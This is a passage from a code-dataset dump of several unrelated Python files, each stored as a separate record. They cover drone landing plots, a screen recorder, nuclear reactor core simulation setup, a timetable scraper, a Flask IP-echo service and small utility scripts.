[\"black\", \"purple\", \"blue\", \"green\", \"yellow\", \"red\"]\n\ntimes = []\nenergies = []\ndescent_edges = []\n\nfor filename in filenames:\n # import flight data\n flight_data = pandas.read_csv(filename)\n\n # get only useful trajectories\n # landing_trajectory = flight_data.where((flight_data[\"whycon_detected\"] == 1) or (flight_data[\"apriltag_detected\"] == 1))\n # landing_trajectory = flight_data.query(\"whycon_detected == 1 | apriltag_detected == 1\")\n landing_trajectory = flight_data.query(\"landing_phase != 5\")\n\n # print(landing_trajectory.head())\n\n axes.plot(landing_trajectory[\"landing_pad_position_y\"] - landing_trajectory[\"iris_position_y\"],\n landing_trajectory[\"landing_pad_position_x\"] - landing_trajectory[\"iris_position_x\"],\n landing_trajectory[\"iris_position_z\"] - landing_trajectory[\"landing_pad_position_z\"])\n\n times.append(landing_trajectory.time.iloc[-1] - landing_trajectory.time.iloc[0])\n energies.append(landing_trajectory.energy_consumed.iloc[-1] - landing_trajectory.energy_consumed.iloc[0])\n\n # for i in range(5):\n #\n # segment = landing_trajectory.query(\"landing_phase != %s\" % 5)\n # # plot 3d trajectory\n # axes.plot(segment[\"landing_pad_position_x\"] - segment[\"iris_position_y\"], segment[\"landing_pad_position_y\"] - segment[\"iris_position_x\"], segment[\"iris_position_z\"] - segment[\"landing_pad_position_z\"], color = colors[i])\n\n # if( i == 4 ):\n # start_time = segment.iloc[0].time\n # # print(segment.head())\n # elif( i == 0 ):\n # end_time = segment.iloc[0].time\n\n axes.view_init(elev=30, azim=40)\n axes.set_xlabel(\"East\")\n axes.set_ylabel(\"North\")\n axes.set_zlabel(\"Up\")\n\n axes.set_xlim3d(-20, 20)\n axes.set_ylim3d(-20, 20)\n\n# plt.savefig(\"/home/joshua/Documents/radial_land_testing/figure.png\", bbox_inches=\"tight\", pad_inches=-0.2, transparent=True)\n# plt.show()\n\nprint(numpy.mean(times), numpy.std(times))\nprint(numpy.mean(energies), numpy.std(energies))","sub_path":"visualize_radial_landings.py","file_name":"visualize_radial_landings.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157721965","text":"#! /usr/bin/python3\n# coding=utf-8\n\"\"\"\nscreen.py \n\nAuthor: wenbao \nDescription: my screen recoreder\n\"\"\"\nimport cv2\nimport datetime\nimport numpy as np\nimport threading\n\nfrom PIL import ImageGrab\nfrom tkinter import Button\nfrom tkinter import Frame\nfrom tkinter import Tk\n\n\nflag = None # 停止标志位\n\n\ndef video_record():\n \"\"\"屏幕录制!\n \"\"\"\n print('开始录制!')\n date = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S') # 当前的时间\n p = ImageGrab.grab() # 获得当前屏幕\n a, b = p.size # 获得当前屏幕的大小\n fourcc = cv2.VideoWriter_fourcc(*'XVID') # 编码格式\n filename = '{}.avi'.format(date)\n fps = 20 # 24\n # cv2.VideoWriter(filename, fourcc, fps, frameSize, isColor)\n # filename 要保存的文件的路径\n # fourcc 指定编码器\n # fps 要保存的视频的帧率\n # frameSize 要保存的文件的画面尺寸\n # isColor 指示是黑白画面还是彩色的画面\n video = cv2.VideoWriter(filename=filename, fourcc=fourcc,\n fps=fps, frameSize=(a, b))\n while True:\n im = ImageGrab.grab()\n imm = cv2.cvtColor(np.array(im), cv2.COLOR_RGB2BGR) # 转为opencv的BGR格式\n video.write(imm)\n if not flag:\n print(\"录制结束!\")\n break\n video.release()\n\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master=master, height=2, bd=1, relief=\"groove\")\n self.pack()\n self.createWidgets()\n\n def createWidgets(self):\n self.start = Button(self, text='start', fg='black',\n bg='white', command=self.start)\n self.start.pack(side='left')\n\n self.stop = Button(self, text='stop', fg='black',\n bg='white', command=self.stop, state='disable')\n self.stop.pack(side='right')\n\n def start(self):\n self.start['state'] = 'disabled'\n self.stop['state'] = 'normal'\n global flag\n flag = True\n self.th = threading.Thread(target=video_record)\n self.th.start()\n\n def stop(self):\n self.start['state'] = 'normal'\n self.stop['state'] = 'disabled'\n global flag\n flag = False\n\n\ndef main():\n try:\n root = Tk() # 创建顶级窗口\n root.minsize(180, 30) # 最小尺寸\n root.maxsize(180, 30) # 最大尺寸\n root.resizable(0, 0)\n root.attributes('-topmost', True, '-alpha', 0.95)\n # root.attributes(\n # '-notify', False,\n # '-modified', False,\n # '-alpha', 0.95,\n # '-fullscreen', False,\n # '-topmost', True)\n\n app = Application(master=root)\n # 设置窗口标题:\n app.master.title('wenbao recorder')\n # 主消息循环:\n app.mainloop()\n except Exception as err:\n raise\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"screen_mac_win/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2670176","text":"#!/usr/bin/python3\n#\n# Script to test for blanket drain criticality safety and shutdown margin\n#\n# Ondrej Chvala, ochvala@utk.edu\n\nfrom ornl4528core import CoreGen\nimport time\n\n# Core parameters\nhpitch:float = 6.045\nr1:float = 2.550\nr2:float = 3.758\nr3:float = 4.534\nl4:float = 5.697\ntempC:float = 700.\nrgr_scale:float = 0.90\nrfuel:float = 200.0\nrcore:float = 230.0\nzcore:float = 400.0\nrefl_ht:float = 100.0\nn_deckname:str = 'ORNL-4528 deck for the normal core'\ns_deckname:str = 'ORNL-4528 deck for the scrammed core'\nd_deckname:str = 'ORNL-4528 deck for the core with a drained blanket'\nt_deckname:str = 'ORNL-4528 deck for the scrammed/stopped core with no flow'\n\n# Define control rod positions and states\nicr:int = 8 # This position gets the largest reactivity effects\ncontrol_rods = [(0,0), (icr,-icr), (icr,0), (0,icr), (-icr,0), (0,-icr), (-icr,icr)]\nn_crod_state = [ 0, 0, 0, 0, 0, 0, 0 ] # All rods out\ns_crod_state = [ 1, 1, 1, 1, 1, 1, 1 ] # All control clusters in\nd_crod_state = [ 2, 2, 2, 2, 2, 2, 2 ] # All floating rods in\nt_crod_state = [ 3, 3, 3, 3, 3, 3, 3 ] # All rods in\n\n# Create ORNL-4528 cores\nnormal_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, n_deckname)\nscrammed_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, s_deckname)\ndrained_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, d_deckname)\nstopped_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, t_deckname)\n\n# List of my cores\nmy_cores = [ normal_core, scrammed_core, drained_core, stopped_core]\n\n# Assign control rod lattice positions, make sure to make geometry and mesh plots\nfor c in my_cores:\n c.geomplots = True\n c.meshplots = True\n c.control_rods = control_rods\n\n# Assign control rod states\nnormal_core.crod_state = n_crod_state\nscrammed_core.crod_state = s_crod_state\ndrained_core.crod_state = d_crod_state\nstopped_core.crod_state = t_crod_state\n\n# Set sub-directories to run each case\nnormal_core.deck_path = './00_normal'\nscrammed_core.deck_path = './01_scrammed'\ndrained_core.deck_path = './02_drained'\nstopped_core.deck_path = './03_stopped'\n\n# Drain the drained core\ndrained_core.blanket_drained = True\n\n# Build all cores and save input decks\nfor c in my_cores:\n c.save_deck()\n\n# Run all cases\nfor c in my_cores:\n if not c.get_calculated_values():\n c.run_deck()\n\n# Wait for Serpent jobs and get results\ncores_done:int = 0\nwhile cores_done < len(my_cores):\n cores_done = 0\n for c in my_cores:\n if(c.k < 0.0):\n if c.get_calculated_values():\n cores_done += 1\n print(\"[DEBUG] Got results for \", c.deck_path)\n else: # Core already read in\n cores_done += 1\n if cores_done < len(my_cores):\n print(\"[DEBUG] \", cores_done, \" done, sleeping ...\")\n time.sleep(20) # Wait a minute for Serpent ...\n\n# Calculate reactivities [pcm]\nrho_n:float = 1e5*( normal_core.k - 1.0) / normal_core.k\nrho_d:float = 1e5*( drained_core.k - 1.0) / drained_core.k\nrho_s:float = 1e5*( scrammed_core.k - 1.0) / scrammed_core.k\nrho_t:float = 1e5*( stopped_core.k - 1.0) / stopped_core.k\n\n# Print results\nprint(\"\\nReactivity [pcm] for the studied cases\")\nprint(\"normal : %8.1f \" % rho_n)\nprint(\"drained : %8.1f \" % rho_d)\nprint(\"scrammed : %8.1f \" % rho_s)\nprint(\"stopped : %8.1f \" % rho_t)\n\nprint(\"\\nReactivity difference [pcm] from normal condition\")\nprint(\"drained : %8.1f \" % (rho_d-rho_n))\nprint(\"scrammed : %8.1f \" % (rho_s-rho_n))\nprint(\"stopped : %8.1f \" % (rho_t-rho_n))\n\n\n\n''' *** Results for different CR absorber choices ***\n--- Enriched B4C ---\nReactivity [pcm] for the studied cases\nnormal : 2927.7 \ndrained : 41704.2 \nscrammed : -5175.4 \nstopped : -5573.0 \n\nReactivity difference [pcm] from normal condition\ndrained : 38776.5 \nscrammed : -8103.1 \nstopped : -8500.7 \n\n--- Natural B4C ---\nReactivity [pcm] for the studied cases\n\nReactivity difference [pcm] from normal condition\n\n--- Boron metal ---\nReactivity [pcm] for the studied cases\n\nReactivity difference [pcm] from normal condition\n\n'''\n","sub_path":"scripts/core-writer-4528-master/core/blanketdrain4528.py","file_name":"blanketdrain4528.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279466369","text":"import csv\nimport pandas\n\n##input csv\n##[identifier, wild(1), mut(1), Chothia_Num]\n\n\ndef getAPSSMscore(input_csv):\n\n APSSM = pandas.read_csv('/home/ymyung/PycharmProjects/selfstudy/PYTHON/resource/new_APSSM.csv', header=0, quotechar='\\'')\n\n dic = {}\n result=[]\n\n for each in range(0,20):\n\n dic[APSSM['position'][each]]=each\n\n with open(input_csv,'r') as inputfile:\n cv = csv.reader(inputfile)\n\n next(cv)\n\n for each in cv:\n identifier = each[0]\n wild = each[1]\n mut = each[2]\n chothia = each[3]\n\n if chothia.startswith('H') or chothia.startswith('L'):\n num = chothia.split('_')[1]\n temp= \"\".join(chothia.split('_'))\n # print(num)\n # print(temp)\n wild_APSSM_score = APSSM[temp][dic[wild]]\n mut_APSSM_score = APSSM[temp][dic[mut]]\n d_APSSM_score = round((mut_APSSM_score - wild_APSSM_score),3)\n # print(mat[temp][dic[wild]])\n # print(mat[temp][dic[mut]])\n # print(wild, mut,temp,wild_APSSM_score,mut_APSSM_score,d_APSSM_score )\n # print(d_APSSM_score )\n result.append([identifier,d_APSSM_score])\n\n elif not chothia.startswith(\"Chothia\"):\n # print(\"0\")\n result.append([identifier,\"?\"])\n return result\n\n\n\n# for test\n# input_csv='/home/ymyung/Desktop/180512_unique_PROXiMATE.csv'\n# for each in (getAPSSMscore(input_csv)):\n# print(each)","sub_path":"PYTHON/new_attr/APSSM.py","file_name":"APSSM.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414236453","text":"# coding: utf-8\n# 例外の種類を変更しよう その2\n\nimport sys\n\nenemies = [\"スライム\", \"ドラゴン\", \"魔王\"]\n\ntry:\n number1 = 0\n print(\"勇者は敵に遭遇した\")\n print(\"勇者は\" + enemies[number2] + \"と戦った\")\nexcept ZeroDivisionError as e:\n sys.stderr.write(\"その敵は表示できません\")\nexcept NameError as e:\n sys.stderr.write(\"未定義の変数を呼び出しています\")\n\nfinally:\n print(\"勇者は勝利した\")\n","sub_path":"paiza/paiza_10/paiza_10_005_001.py","file_name":"paiza_10_005_001.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"221552315","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\n\nimport frappe, verp\nfrom frappe.utils import flt\nfrom frappe.utils.make_random import get_random\nfrom verp.projects.doctype.timesheet.test_timesheet import make_timesheet\nfrom verp.demo.user.hr import make_sales_invoice_for_timesheet\n\ndef run_projects(current_date):\n\tfrappe.set_user(frappe.db.get_global('demo_projects_user'))\n\tif frappe.db.get_global('demo_projects_user'):\n\t\tmake_project(current_date)\n\t\tmake_timesheet_for_projects(current_date)\n\t\tclose_tasks(current_date)\n\ndef make_timesheet_for_projects(current_date\t):\n\tfor data in frappe.get_all(\"Task\", [\"name\", \"project\"], {\"status\": \"Open\", \"exp_end_date\": (\"<\", current_date)}):\n\t\temployee = get_random(\"Employee\")\n\t\tts = make_timesheet(employee, simulate = True, billable = 1, company = verp.get_default_company(),\n\t\t\tactivity_type=get_random(\"Activity Type\"), project=data.project, task =data.name)\n\n\t\tif flt(ts.total_billable_amount) > 0.0:\n\t\t\tmake_sales_invoice_for_timesheet(ts.name)\n\t\t\tfrappe.db.commit()\n\ndef close_tasks(current_date):\n\tfor task in frappe.get_all(\"Task\", [\"name\"], {\"status\": \"Open\", \"exp_end_date\": (\"<\", current_date)}):\n\t\ttask = frappe.get_doc(\"Task\", task.name)\n\t\ttask.status = \"Completed\"\n\t\ttask.save()\n\ndef make_project(current_date):\n\tif not frappe.db.exists('Project',\n\t\t\"New Product Development \" + current_date.strftime(\"%Y-%m-%d\")):\n\t\tproject = frappe.get_doc({\n\t\t\t\"doctype\": \"Project\",\n\t\t\t\"project_name\": \"New Product Development \" + current_date.strftime(\"%Y-%m-%d\"),\n\t\t})\n\t\tproject.insert()\n","sub_path":"verp/demo/user/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152796633","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\n\n\nclass Parser:\n def __init__(self):\n self.timetable = {\n 'week_1': {\n 'monday': [],\n 'tuesday': [],\n 'wednesday': [],\n 'thursday': [],\n 'friday': [],\n 'saturday': [],\n },\n 'week_2': {\n 'monday': [],\n 'tuesday': [],\n 'wednesday': [],\n 'thursday': [],\n 'friday': [],\n 'saturday': [],\n }\n }\n\n def get_int_subgroup(self, string):\n for symbol in string:\n if symbol.isdigit():\n return int(symbol)\n\n def parse_type_of_subject(self, name_subject):\n type_subject = name_subject[ name_subject.find('(') + 1 : name_subject.find(')') ]\n if type_subject not in ['Лекция', 'Практика', 'Лабораторная работа']:\n name_subject = name_subject.replace(f'({type_subject})', '')\n return name_subject[ name_subject.find('(') + 1 : name_subject.find(')') ]\n\n def parse_cabinet(self, cabinet):\n cabinet = cabinet.replace('корп. ', '')\n cabinet = cabinet.replace(' каб. ', '-')\n cabinet = cabinet.replace('\"', '')\n return cabinet\n\n def get_time(self, line):\n return re.sub(r\"\\s\", \"\", line.find('div', {'class': 'hidden-xs'}).text)\n\n def get_subjects(self, line):\n div_row = line.find('div', {'class': 'row'})\n return div_row.find_all('div')\n\n def get_name_subjects(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n name = sub_subject.find('span', {'class': 'name'}).text\n result.append(name)\n return result\n\n def get_type_subjects(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n type_subject = self.parse_type_of_subject(sub_subject.find('span', {'class': 'name'}).parent.text )\n result.append(type_subject)\n return result\n\n def get_teachers(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(sub_subject.find('a').text)\n return result\n\n def get_location_in_university(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(self.parse_cabinet(sub_subject.find('a', {'href': '#'}).text))\n return result\n\n def get_location_in_city(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(sub_subject.find('a', {'href': '#'})['title'])\n return result\n\n def get_subgroups(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n subgroup = None\n if sub_subject.find('i', {'class': 'fa-paperclip'}) is not None:\n subgroup = self.get_int_subgroup(sub_subject.find_all('li')[-1].text)\n \n if sub_subject.find('li', {'class': 'num_pdgrp'}) is not None:\n subgroup = self.get_int_subgroup(sub_subject.find('li', {'class': 'num_pdgrp'}).text)\n \n result.append(subgroup)\n return result\n\n def get_day_timetable(self, numb_week, day, id):\n response = requests.get(\n f'https://timetable.pallada.sibsau.ru/timetable/group/{id}'\n ).text\n soup = BeautifulSoup(response, 'html.parser')\n return soup.select(f'#week_{numb_week}_tab > div.day.{day} > div.body')\n\n def is_weekend(self, day_timetable):\n return len(day_timetable) == 0\n\n def get_timetable(self, id):\n for numb_week in range(1, 3):\n days = self.timetable[f'week_{numb_week}']\n for day in days:\n day_timetable = self.get_day_timetable(numb_week, day, id)\n if self.is_weekend(day_timetable):\n days[day].append({'weekend': 'Отдыхайте'})\n continue\n\n for line in day_timetable[0].find_all('div', {'class': 'line'}):\n days[day].append({\n 'time': self.get_time(line),\n 'name_subjects': self.get_name_subjects(line),\n 'type_subjects': self.get_type_subjects(line),\n 'teachers': self.get_teachers(line),\n 'subgroups': self.get_subgroups(line),\n 'location_in_university': self.get_location_in_university(line),\n 'location_in_city': self.get_location_in_city(line)\n })\n\n return self.timetable\n","sub_path":"timetable_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500021909","text":"from io import BytesIO\n\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom reportlab.lib.colors import (\n brown,\n white\n)\nfrom reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib.styles import ParagraphStyle\nfrom reportlab.platypus import (\n Paragraph,\n Table,\n TableStyle\n)\nfrom reportlab.platypus import SimpleDocTemplate\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\n\nfrom articulo.serializers import *\n\n\ndef recetas(request):\n return render_to_response('recetas.html')\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass DoctorViewSet(viewsets.ModelViewSet):\n queryset = Doctor.objects.all()\n serializer_class = DoctorSerializer\n\n\nclass ClienteViewSet(viewsets.ModelViewSet):\n queryset = Cliente.objects.all()\n serializer_class = ClienteSerializer\n\nclass RecetaViewSet(viewsets.ModelViewSet):\n queryset = Receta.objects.all()\n serializer_class = RecetaSerializer\n\n def list(self, request, **kwargs):\n try:\n\n recetas = query_recetas_by_args(**request.query_params)\n serializer = RecetaSerializer(recetas['items'], context={'request': request}, many=True)\n result = dict()\n result['data'] = serializer.data\n result['draw'] = recetas['draw']\n result['recordsTotal'] = recetas['total']\n result['recordsFiltered'] = recetas['count']\n\n return Response(result, status=status.HTTP_200_OK, template_name=None, content_type=None)\n\n except Exception as e:\n return Response(e, status=status.HTTP_404_NOT_FOUND, template_name=None, content_type=None)\n\n\ndef pdf_receta(request):\n response = HttpResponse(content_type='application/pdf')\n id = request.GET['id']\n receta = Receta.objects.get(pk=id)\n pdf_name = \"receta \" + str(receta.numero) + \".pdf\"\n response['Content-Disposition'] = 'attachment; filename=%s' % pdf_name\n buffer = BytesIO()\n doc = SimpleDocTemplate(buffer,\n pagesize=letter,\n rightMargin=40,\n leftMargin=40,\n topMargin=60,\n bottomMargin=18,\n )\n # table header\n content = []\n styles = stylesheet()\n tb_fecha = [\n [Paragraph(\"FECHA\", styles['default']),\n Paragraph(str(receta.fecha.day), styles['default']),\n Paragraph(str(receta.fecha.month), styles['center']),\n Paragraph(str(receta.fecha.year), styles['rigth'])],\n [Paragraph(\"RETIRA\", styles['default']),\n Paragraph(\" \", styles['default']),\n Paragraph(\" \", styles['center']),\n Paragraph(\" \", styles['rigth'])]\n ]\n tb = Table(tb_fecha)\n tb.setStyle(TableStyle(\n [\n ('GRID', (1, 0), (3, -1), 1, brown),\n ('BACKGROUND', (0, 0), (-1, 0), None)\n ]\n ))\n # banner = Image('../../venta/static/images/banner.png')\n tbl_data = [\n [Paragraph(\"Opticas Alemanas(LOGO)\", styles['default']),\n Paragraph(\"Orden de trabajo\", styles['title']),\n Paragraph(\" \", styles['default'])\n ],\n [Paragraph(\" \", styles['default']),\n Paragraph(str(receta.numero), styles['title'])],\n [Paragraph(\" \", styles['default']),\n Paragraph(\" \", styles['title']),\n tb]\n ]\n tb_header = Table(tbl_data)\n content.append(tb_header)\n pedido = Paragraph(\"Pedido a: \", styles['default'])\n content.append(pedido)\n cliente = Paragraph(\"Señor: \" + receta.cliente.usuario.first_name + \" \" + receta.cliente.usuario.last_name,\n styles['default'])\n content.append(cliente)\n direccion = Paragraph(\"Domicilio: \", styles['default'])\n content.append(direccion)\n tbl_data = [\n [Paragraph(\"Tel: \" + receta.cliente.telefono, styles['default']),\n Paragraph(\"CI: \" + receta.cliente.CI, styles['center']),\n Paragraph(\"E-mail: \" + receta.cliente.usuario.email, styles['rigth'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n content.append(Paragraph(\"MEDICIÓN\", styles['center']))\n headings = ('', Paragraph(\"ESF.\", styles['center']), Paragraph(\"CIL\", styles['center']),\n Paragraph(\"EJE\", styles['center']), Paragraph(\"PRISMA\", styles['center']),\n Paragraph(\"DI.INT\", styles['center']), Paragraph(\"ALT.\", styles['center']))\n\n m_lejos_od = Medicion()\n m_lejos_oi = Medicion()\n m_cerca_od = Medicion()\n m_cerca_oi = Medicion()\n if receta.lente_cerca:\n m_lejos_od = receta.lente_cerca.cristalDer.medicion_lejos\n m_lejos_oi = receta.lente_cerca.cristalIzq.medicion_lejos\n if receta.lente_lejos:\n m_cerca_od = receta.lente_cerca.cristalDer.medicion_cerca\n m_cerca_oi = receta.lente_cerca.cristalIzq.medicion_cerca\n mediciones = [\n [Paragraph(\"Lejos OD.\", styles['rigth']), Paragraph(str(m_lejos_od.esfera), styles['center']),\n Paragraph(str(m_lejos_od.cilindro), styles['center']),\n Paragraph(str(m_lejos_od.eje)+\"º\", styles['center']),\n Paragraph(str(m_lejos_od.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_lejos_od.altura), styles['center'])\n ],\n [Paragraph(\"OI.\", styles['rigth']), Paragraph(str(m_lejos_oi.esfera), styles['center']),\n Paragraph(str(m_lejos_oi.cilindro), styles['center']),\n Paragraph(str(m_lejos_oi.eje)+\"º\", styles['center']),\n Paragraph(str(m_lejos_oi.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_lejos_oi.altura), styles['center'])\n ],\n [Paragraph(\"Cerca OD.\", styles['rigth']), Paragraph(str(m_cerca_od.esfera), styles['center']),\n Paragraph(str(m_cerca_od.cilindro), styles['center']),\n Paragraph(str(m_cerca_od.eje)+\"º\", styles['center']),\n Paragraph(str(m_cerca_od.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_cerca_od.altura), styles['center'])\n ],\n [Paragraph(\"OI.\", styles['rigth']), Paragraph(str(m_cerca_oi.esfera), styles['center']),\n Paragraph(str(m_cerca_oi.cilindro), styles['center']),\n Paragraph(str(m_cerca_oi.eje)+\"º\", styles['center']),\n Paragraph(str(m_cerca_oi.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_cerca_oi.altura), styles['center'])\n ],\n ]\n t = Table([headings] + mediciones)\n t.setStyle(TableStyle(\n [\n ('GRID', (0, 0), (6, 4), 1, brown),\n ('BACKGROUND', (0, 0), (-1, 0), None)\n ]\n ))\n content.append(t)\n if receta.lente_cerca:\n tbl_data = [\n [Paragraph(\"CERCA\", styles['dist'])],\n [\n Paragraph(\"MATERIAL CRISTAL\", styles['center']),\n Paragraph(\"MODELO\", styles['center']),\n Paragraph(\"COLOR\", styles['center'])],\n [\n Paragraph(receta.lente_cerca.cristalIzq.material_cristal.nombre, styles['center']),\n Paragraph(receta.lente_cerca.cristalIzq.modelo.nombre, styles['center']),\n Paragraph(receta.lente_cerca.cristalIzq.color.nombre, styles['center'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n if receta.lente_cerca.cristalIzq.tratamientos.count()>0:\n tratamientos = [[Paragraph(\"TRATAMIENTOS CRISTAL\", styles['center'])]]\n for t in receta.lente_cerca.cristalIzq.tratamientos.all():\n tratamientos.append([Paragraph(t.nombre, styles['center'])])\n tb = Table(tratamientos)\n content.append(tb)\n content.append(Paragraph('Armazón: '+receta.lente_cerca.nombre+\" \"+str(receta.lente_cerca.codigo), styles['default']))\n content.append(Paragraph('Obs: ' + receta.lente_cerca.descripcion, styles['default']))\n if receta.lente_lejos:\n tbl_data = [\n [Paragraph(\"LEJOS\", styles['dist'])],\n [\n Paragraph(\"MATERIAL CRISTAL\", styles['center']),\n Paragraph(\"MODELO\", styles['center']),\n Paragraph(\"COLOR\", styles['center'])],\n [\n Paragraph(receta.lente_lejos.cristalIzq.material_cristal.nombre, styles['center']),\n Paragraph(receta.lente_lejos.cristalIzq.modelo.nombre, styles['center']),\n Paragraph(receta.lente_lejos.cristalIzq.color.nombre, styles['center'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n if receta.lente_lejos.cristalIzq.tratamientos.count()>0:\n tratamientos = [[Paragraph(\"TRATAMIENTOS CRISTAL\", styles['center'])]]\n for t in receta.lente_lejos.cristalIzq.tratamientos.all():\n tratamientos.append([Paragraph(t.nombre, styles['center'])])\n tb = Table(tratamientos)\n content.append(tb)\n content.append(Paragraph('Armazón: ' + receta.lente_lejos.nombre + \" \" + str(receta.lente_lejos.codigo),\n styles['default']))\n content.append(Paragraph('Obs: ' + receta.lente_lejos.descripcion, styles['default']))\n content.append(Paragraph('Dr.: ' + receta.doctor.usuario.first_name+\" \"+ receta.doctor.usuario.last_name, styles['center']))\n doc.build(content)\n response.write(buffer.getvalue())\n buffer.close()\n return response\n\ndef stylesheet():\n styles = {\n 'default': ParagraphStyle(\n 'default',\n fontName='Times-Roman',\n fontSize=12,\n leading=18,\n leftIndent=0,\n rightIndent=0,\n firstLineIndent=0,\n alignment=TA_LEFT,\n spaceBefore=0,\n spaceAfter=0,\n bulletFontName='Times-Roman',\n bulletFontSize=10,\n bulletIndent=0,\n textColor=brown,\n backColor=None,\n wordWrap=None,\n borderWidth=0,\n borderPadding=0,\n borderColor=None,\n borderRadius=None,\n allowWidows=1,\n allowOrphans=0,\n textTransform=None, # 'uppercase' | 'lowercase' | None\n endDots=None,\n splitLongWords=1,\n ),\n }\n styles['title'] = ParagraphStyle(\n 'title',\n parent=styles['default'],\n fontName='Helvetica-Bold',\n fontSize=14,\n leading=18,\n alignment=TA_CENTER,\n textColor=brown,\n textTransform='uppercase',\n )\n styles['center'] = ParagraphStyle(name='center', parent=styles['default'], textColor=brown, alignment=TA_CENTER)\n styles['rigth'] = ParagraphStyle(name='right', parent=styles['default'], textColor=brown, alignment=TA_RIGHT)\n styles['dist'] = ParagraphStyle(name='dist', fontName='Helvetica-Bold', parent=styles['default'], textColor=white,\n backColor=brown, alignment=TA_CENTER)\n return styles\n","sub_path":"receta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104856146","text":"from flask import Flask, render_template, request, jsonify\nimport socket \n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"GET\"])\ndef get_my_ip():\n\n if request.environ.get('HTTP_CF_CONNECTING_IPV6'):\n real_ip = request.environ.get('HTTP_CF_CONNECTING_IPV6')\n else:\n real_ip = request.environ['HTTP_X_FORWARDED_FOR'].split(',')[0]\n\n try:\n ip_hostname = socket.gethostbyaddr(real_ip)[0]\n except:\n ip_hostname = \"No reverse DNS for IP\"\n return render_template(\n 'ip_new.html', ip=real_ip, hostname=ip_hostname\n )\n\n@app.route(\"/api\", methods=[\"GET\"])\ndef get_my_ip_api():\n return_data = {}\n \n if request.environ.get('HTTP_CF_CONNECTING_IPV6'):\n real_ip = request.environ.get('HTTP_CF_CONNECTING_IPV6')\n else:\n real_ip = request.environ['HTTP_X_FORWARDED_FOR'].split(',')[0]\n\n try:\n ip_hostname = socket.gethostbyaddr(real_ip)[0]\n except:\n ip_hostname = \"no_rdns_for_ip\"\n\n return_data['ip'] = real_ip\n return_data['hostname'] = ip_hostname\n \n try:\n if request.environ['HTTP_DNT']:\n return_data['do_not_track'] = 'true'\n else:\n return_data['do_not_track'] = 'false'\n except:\n return_data['do_not_track'] = 'unknown'\n try:\n return_data['user_agent'] = request.environ['HTTP_USER_AGENT']\n except:\n return_data['user_agent'] = \"unknown\"\n\n return jsonify(return_data),200\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349710951","text":"\"\"\"Nanopore analysis methods for TACA.\"\"\"\nimport os\nimport logging\nimport subprocess\n\nfrom dateutil.parser import parse\nfrom taca.utils.config import CONFIG\nfrom taca.utils.misc import send_mail\nfrom taca.nanopore.minion import MinIONdelivery, MinIONqc\nfrom taca.nanopore.ont_transfer import PromethionTransfer, MinionTransfer\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_date(string):\n \"\"\"\n Return whether the string can be interpreted as a date.\n\n :param string: str, string to check for date\n From https://stackoverflow.com/questions/25341945/check-if-string-has-date-any-format\n \"\"\"\n try:\n parse(string, fuzzy=False)\n return True\n except ValueError:\n return False\n\n\ndef find_minion_runs(minion_data_dir, skip_dirs):\n \"\"\"Find nanopore runs to process.\"\"\"\n found_run_dirs = []\n try:\n found_top_dirs = [\n os.path.join(minion_data_dir, top_dir)\n 